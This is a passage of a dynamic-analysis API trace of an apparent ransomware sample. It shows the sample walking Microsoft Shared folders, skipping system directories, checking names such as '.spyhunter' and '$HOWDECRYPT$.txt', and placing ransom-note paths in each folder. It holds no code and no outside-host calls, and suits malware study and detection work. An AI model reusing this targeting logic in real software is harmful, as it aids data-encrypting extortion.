FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.796] lstrcmpiW (lpString1="Shorthand.emf", lpString2="Windows") returned -1 [0089.796] lstrlenW (lpString="Windows") returned 7 [0089.796] lstrcmpiW (lpString1="Shorthand.emf", lpString2="$Recycle.bin") returned 1 [0089.796] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.796] lstrcmpiW (lpString1="Shorthand.emf", lpString2="System Volume Information") returned -1 [0089.796] lstrlenW (lpString="System Volume Information") returned 25 [0089.796] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shorthand.emf") returned 75 [0089.796] StrStrIW (lpFirst="Shorthand.emf", lpSrch=".spyhunter") returned 0x0 [0089.796] lstrcmpW (lpString1="Shorthand.emf", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.796] lstrcmpW (lpString1="Shorthand.emf", lpString2="_uninstalling_.png") returned 1 [0089.796] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shorthand.emf") returned 75 [0089.796] GetProcessHeap () returned 0x2c0000 [0089.796] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd8) returned 0x385de0 [0089.796] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xe60) returned 0x3824f8 [0089.796] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.796] lstrcmpiW (lpString1="Small_News.jpg", lpString2="Windows") returned -1 [0089.796] lstrlenW (lpString="Windows") returned 7 [0089.796] lstrcmpiW (lpString1="Small_News.jpg", lpString2="$Recycle.bin") returned 1 [0089.797] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.797] lstrcmpiW (lpString1="Small_News.jpg", lpString2="System Volume Information") returned -1 [0089.797] lstrlenW (lpString="System Volume Information") returned 25 [0089.797] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Small_News.jpg") returned 76 [0089.797] StrStrIW (lpFirst="Small_News.jpg", lpSrch=".spyhunter") returned 0x0 [0089.797] lstrcmpW (lpString1="Small_News.jpg", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.797] lstrcmpW (lpString1="Small_News.jpg", lpString2="_uninstalling_.png") returned 1 [0089.797] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Small_News.jpg") returned 76 [0089.797] GetProcessHeap () returned 0x2c0000 [0089.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x373bc0 [0089.797] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xe68) returned 0x3824f8 [0089.797] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.797] lstrcmpiW (lpString1="Soft Blue.htm", lpString2="Windows") returned -1 [0089.797] lstrlenW (lpString="Windows") returned 7 [0089.797] lstrcmpiW (lpString1="Soft Blue.htm", lpString2="$Recycle.bin") returned 1 [0089.797] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.797] lstrcmpiW (lpString1="Soft Blue.htm", lpString2="System Volume Information") returned -1 [0089.797] lstrlenW (lpString="System Volume Information") returned 25 [0089.797] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Soft Blue.htm") returned 75 [0089.797] StrStrIW (lpFirst="Soft Blue.htm", lpSrch=".spyhunter") returned 0x0 [0089.797] lstrcmpW (lpString1="Soft Blue.htm", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.797] lstrcmpW (lpString1="Soft Blue.htm", lpString2="_uninstalling_.png") returned 1 [0089.797] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Soft Blue.htm") returned 75 [0089.797] GetProcessHeap () returned 0x2c0000 [0089.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd8) returned 0x385fa0 [0089.797] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xe70) returned 0x3824f8 [0089.798] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.798] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2="Windows") returned -1 [0089.798] lstrlenW (lpString="Windows") returned 7 [0089.798] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2="$Recycle.bin") returned 1 [0089.798] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.798] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2="System Volume Information") returned -1 [0089.798] lstrlenW (lpString="System Volume Information") returned 25 [0089.798] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\SoftBlue.jpg") returned 74 [0089.798] StrStrIW (lpFirst="SoftBlue.jpg", lpSrch=".spyhunter") returned 0x0 [0089.798] lstrcmpW (lpString1="SoftBlue.jpg", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.798] lstrcmpW (lpString1="SoftBlue.jpg", lpString2="_uninstalling_.png") returned 1 [0089.798] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\SoftBlue.jpg") returned 74 [0089.798] GetProcessHeap () returned 0x2c0000 [0089.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd6) returned 0x386080 [0089.798] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xe78) returned 0x3824f8 [0089.798] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.798] lstrcmpiW (lpString1="Stars.htm", lpString2="Windows") returned -1 [0089.798] lstrlenW (lpString="Windows") returned 7 [0089.798] lstrcmpiW (lpString1="Stars.htm", lpString2="$Recycle.bin") returned 1 [0089.798] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.798] lstrcmpiW (lpString1="Stars.htm", lpString2="System Volume Information") returned -1 [0089.798] lstrlenW (lpString="System Volume Information") returned 25 [0089.798] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stars.htm") returned 71 [0089.798] StrStrIW (lpFirst="Stars.htm", lpSrch=".spyhunter") returned 0x0 [0089.798] lstrcmpW (lpString1="Stars.htm", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.798] lstrcmpW (lpString1="Stars.htm", lpString2="_uninstalling_.png") returned 1 [0089.799] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stars.htm") returned 71 [0089.799] GetProcessHeap () returned 0x2c0000 [0089.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x37dcf0 [0089.799] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xe80) returned 0x3824f8 [0089.799] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.799] lstrcmpiW (lpString1="Stars.jpg", lpString2="Windows") returned -1 [0089.799] lstrlenW (lpString="Windows") returned 7 [0089.799] lstrcmpiW (lpString1="Stars.jpg", lpString2="$Recycle.bin") returned 1 [0089.799] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.799] lstrcmpiW (lpString1="Stars.jpg", lpString2="System Volume Information") returned -1 [0089.799] lstrlenW (lpString="System Volume Information") returned 25 [0089.799] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stars.jpg") returned 71 [0089.799] StrStrIW (lpFirst="Stars.jpg", lpSrch=".spyhunter") returned 0x0 [0089.799] lstrcmpW (lpString1="Stars.jpg", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.799] lstrcmpW (lpString1="Stars.jpg", lpString2="_uninstalling_.png") returned 1 [0089.799] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stars.jpg") returned 71 [0089.799] GetProcessHeap () returned 0x2c0000 [0089.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x37ddc8 [0089.799] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xe88) returned 0x3824f8 [0089.799] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.799] lstrcmpiW (lpString1="Stucco.gif", lpString2="Windows") returned -1 [0089.799] lstrlenW (lpString="Windows") returned 7 [0089.799] lstrcmpiW (lpString1="Stucco.gif", lpString2="$Recycle.bin") returned 1 [0089.799] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.799] lstrcmpiW (lpString1="Stucco.gif", lpString2="System Volume Information") returned -1 [0089.799] lstrlenW (lpString="System Volume Information") returned 25 [0089.799] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stucco.gif") returned 72 [0089.799] StrStrIW (lpFirst="Stucco.gif", lpSrch=".spyhunter") returned 0x0 [0089.800] lstrcmpW (lpString1="Stucco.gif", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.800] lstrcmpW (lpString1="Stucco.gif", lpString2="_uninstalling_.png") returned 1 [0089.800] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stucco.gif") returned 72 [0089.800] GetProcessHeap () returned 0x2c0000 [0089.800] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd2) returned 0x386160 [0089.800] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xe90) returned 0x3824f8 [0089.800] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.800] lstrcmpiW (lpString1="Tanspecks.jpg", lpString2="Windows") returned -1 [0089.800] lstrlenW (lpString="Windows") returned 7 [0089.800] lstrcmpiW (lpString1="Tanspecks.jpg", lpString2="$Recycle.bin") returned 1 [0089.800] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.800] lstrcmpiW (lpString1="Tanspecks.jpg", lpString2="System Volume Information") returned 1 [0089.800] lstrlenW (lpString="System Volume Information") returned 25 [0089.800] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Tanspecks.jpg") returned 75 [0089.800] StrStrIW (lpFirst="Tanspecks.jpg", lpSrch=".spyhunter") returned 0x0 [0089.800] lstrcmpW (lpString1="Tanspecks.jpg", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.800] lstrcmpW (lpString1="Tanspecks.jpg", lpString2="_uninstalling_.png") returned 1 [0089.800] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Tanspecks.jpg") returned 75 [0089.800] GetProcessHeap () returned 0x2c0000 [0089.800] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd8) returned 0x386240 [0089.800] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xe98) returned 0x3824f8 [0089.800] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.800] lstrcmpiW (lpString1="Tiki.gif", lpString2="Windows") returned -1 [0089.800] lstrlenW (lpString="Windows") returned 7 [0089.800] lstrcmpiW (lpString1="Tiki.gif", lpString2="$Recycle.bin") returned 1 [0089.800] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.801] lstrcmpiW (lpString1="Tiki.gif", lpString2="System Volume Information") returned 1 [0089.801] lstrlenW (lpString="System Volume Information") returned 25 [0089.801] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Tiki.gif") returned 70 [0089.801] StrStrIW (lpFirst="Tiki.gif", lpSrch=".spyhunter") returned 0x0 [0089.801] lstrcmpW (lpString1="Tiki.gif", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.801] lstrcmpW (lpString1="Tiki.gif", lpString2="_uninstalling_.png") returned 1 [0089.801] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Tiki.gif") returned 70 [0089.801] GetProcessHeap () returned 0x2c0000 [0089.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xce) returned 0x37dea0 [0089.801] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xea0) returned 0x3824f8 [0089.801] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.801] lstrcmpiW (lpString1="To_Do_List.emf", lpString2="Windows") returned -1 [0089.801] lstrlenW (lpString="Windows") returned 7 [0089.801] lstrcmpiW (lpString1="To_Do_List.emf", lpString2="$Recycle.bin") returned 1 [0089.801] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.801] lstrcmpiW (lpString1="To_Do_List.emf", lpString2="System Volume Information") returned 1 [0089.801] lstrlenW (lpString="System Volume Information") returned 25 [0089.801] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\To_Do_List.emf") returned 76 [0089.801] StrStrIW (lpFirst="To_Do_List.emf", lpSrch=".spyhunter") returned 0x0 [0089.802] lstrcmpW (lpString1="To_Do_List.emf", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.802] lstrcmpW (lpString1="To_Do_List.emf", lpString2="_uninstalling_.png") returned 1 [0089.802] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\To_Do_List.emf") returned 76 [0089.802] GetProcessHeap () returned 0x2c0000 [0089.802] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x373ca8 [0089.802] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xea8) returned 0x3824f8 [0089.802] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.802] lstrcmpiW (lpString1="White_Chocolate.jpg", lpString2="Windows") returned -1 [0089.802] lstrlenW (lpString="Windows") returned 7 [0089.802] lstrcmpiW (lpString1="White_Chocolate.jpg", lpString2="$Recycle.bin") returned 1 [0089.802] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.802] lstrcmpiW (lpString1="White_Chocolate.jpg", lpString2="System Volume Information") returned 1 [0089.802] lstrlenW (lpString="System Volume Information") returned 25 [0089.802] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\White_Chocolate.jpg") returned 81 [0089.802] StrStrIW (lpFirst="White_Chocolate.jpg", lpSrch=".spyhunter") returned 0x0 [0089.802] lstrcmpW (lpString1="White_Chocolate.jpg", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.802] lstrcmpW (lpString1="White_Chocolate.jpg", lpString2="_uninstalling_.png") returned 1 [0089.802] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\White_Chocolate.jpg") returned 81 [0089.802] GetProcessHeap () returned 0x2c0000 [0089.802] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x329bd8 [0089.803] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xeb0) returned 0x3824f8 [0089.803] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.803] lstrcmpiW (lpString1="Wrinkled_Paper.gif", lpString2="Windows") returned 1 [0089.803] lstrlenW (lpString="Windows") returned 7 [0089.803] lstrcmpiW (lpString1="Wrinkled_Paper.gif", lpString2="$Recycle.bin") returned 1 [0089.803] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.803] lstrcmpiW (lpString1="Wrinkled_Paper.gif", lpString2="System Volume Information") returned 1 [0089.803] lstrlenW (lpString="System Volume Information") returned 25 [0089.803] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Wrinkled_Paper.gif") returned 80 [0089.803] StrStrIW (lpFirst="Wrinkled_Paper.gif", lpSrch=".spyhunter") returned 0x0 [0089.803] lstrcmpW (lpString1="Wrinkled_Paper.gif", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.803] lstrcmpW (lpString1="Wrinkled_Paper.gif", lpString2="_uninstalling_.png") returned 1 [0089.803] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Wrinkled_Paper.gif") returned 80 [0089.803] GetProcessHeap () returned 0x2c0000 [0089.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x329cc8 [0089.803] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xeb8) returned 0x3824f8 [0089.803] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0 [0089.803] FindClose (in: hFindFile=0x335f60 | out: hFindFile=0x335f60) returned 1 [0089.805] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\$HOWDECRYPT$.txt") returned 78 [0089.805] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\$HOWDECRYPT$.txt") returned 78 [0089.805] GetProcessHeap () returned 0x2c0000 [0089.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x373d90 [0089.805] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xec0) returned 0x3824f8 [0089.806] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0089.806] lstrcmpiW (lpString1="TextConv", lpString2="Windows") returned -1 [0089.806] lstrlenW (lpString="Windows") returned 7 [0089.806] lstrcmpiW (lpString1="TextConv", lpString2="$Recycle.bin") returned 1 [0089.806] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.806] lstrcmpiW (lpString1="TextConv", lpString2="System Volume Information") returned 1 [0089.807] lstrlenW (lpString="System Volume Information") returned 25 [0089.807] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv") returned 59 [0089.807] lstrcmpW (lpString1="TextConv", lpString2=".") returned 1 [0089.807] lstrcmpW (lpString1="TextConv", lpString2="..") returned 1 [0089.807] GetProcessHeap () returned 0x2c0000 [0089.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0089.807] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\*") returned 61 [0089.807] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\*", lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0x335f60 [0089.808] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.808] lstrlenW (lpString="Windows") returned 7 [0089.808] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.808] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.808] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.808] lstrlenW (lpString="System Volume Information") returned 25 [0089.808] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\.") returned 61 [0089.808] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.808] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.808] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.808] lstrlenW (lpString="Windows") returned 7 [0089.808] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.808] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.808] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.808] lstrlenW (lpString="System Volume Information") returned 25 [0089.808] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\..") returned 62 [0089.808] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.808] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.808] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.809] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0089.809] lstrlenW (lpString="Windows") returned 7 [0089.809] lstrcmpiW (lpString1="en-US", lpString2="$Recycle.bin") returned 1 [0089.809] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.809] lstrcmpiW (lpString1="en-US", lpString2="System Volume Information") returned -1 [0089.809] lstrlenW (lpString="System Volume Information") returned 25 [0089.809] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\en-US") returned 65 [0089.809] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0089.809] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0089.809] GetProcessHeap () returned 0x2c0000 [0089.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0089.810] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\en-US\\*") returned 67 [0089.810] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\en-US\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0089.810] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.810] lstrlenW (lpString="Windows") returned 7 [0089.810] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.810] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.810] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.810] lstrlenW (lpString="System Volume Information") returned 25 [0089.810] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\en-US\\.") returned 67 [0089.810] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.810] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0089.810] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.810] lstrlenW (lpString="Windows") returned 7 [0089.810] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.810] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.810] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.810] lstrlenW (lpString="System Volume Information") returned 25 [0089.810] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\en-US\\..") returned 68 [0089.810] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.810] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.811] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0089.811] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0089.811] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\en-US\\$HOWDECRYPT$.txt") returned 82 [0089.811] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\en-US\\$HOWDECRYPT$.txt") returned 82 [0089.811] GetProcessHeap () returned 0x2c0000 [0089.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe6) returned 0x343848 [0089.811] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xec8) returned 0x3824f8 [0089.811] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.811] lstrcmpiW (lpString1="MSCONV97.DLL", lpString2="Windows") returned -1 [0089.811] lstrlenW (lpString="Windows") returned 7 [0089.811] lstrcmpiW (lpString1="MSCONV97.DLL", lpString2="$Recycle.bin") returned 1 [0089.811] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.811] lstrcmpiW (lpString1="MSCONV97.DLL", lpString2="System Volume Information") returned -1 [0089.812] lstrlenW (lpString="System Volume Information") returned 25 [0089.812] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL") returned 72 [0089.812] StrStrIW (lpFirst="MSCONV97.DLL", lpSrch=".spyhunter") returned 0x0 [0089.812] lstrcmpW (lpString1="MSCONV97.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.812] lstrcmpW (lpString1="MSCONV97.DLL", lpString2="_uninstalling_.png") returned 1 [0089.812] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL") returned 72 [0089.812] GetProcessHeap () returned 0x2c0000 [0089.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd2) returned 0x386320 [0089.812] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xed0) returned 0x3824f8 [0089.812] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.812] lstrcmpiW (lpString1="RECOVR32.CNV", lpString2="Windows") returned -1 [0089.812] lstrlenW (lpString="Windows") returned 7 [0089.812] lstrcmpiW (lpString1="RECOVR32.CNV", lpString2="$Recycle.bin") returned 1 [0089.812] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.812] lstrcmpiW (lpString1="RECOVR32.CNV", lpString2="System Volume Information") returned -1 [0089.812] lstrlenW (lpString="System Volume Information") returned 25 [0089.812] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\RECOVR32.CNV") returned 72 [0089.812] StrStrIW (lpFirst="RECOVR32.CNV", lpSrch=".spyhunter") returned 0x0 [0089.812] lstrcmpW (lpString1="RECOVR32.CNV", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.812] lstrcmpW (lpString1="RECOVR32.CNV", lpString2="_uninstalling_.png") returned 1 [0089.812] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\RECOVR32.CNV") returned 72 [0089.812] GetProcessHeap () returned 0x2c0000 [0089.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd2) returned 0x386400 [0089.812] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xed8) returned 0x3824f8 [0089.812] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.812] lstrcmpiW (lpString1="Wks9Pxy.cnv", lpString2="Windows") returned 1 [0089.813] lstrlenW (lpString="Windows") returned 7 [0089.813] lstrcmpiW (lpString1="Wks9Pxy.cnv", lpString2="$Recycle.bin") returned 1 [0089.813] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.813] 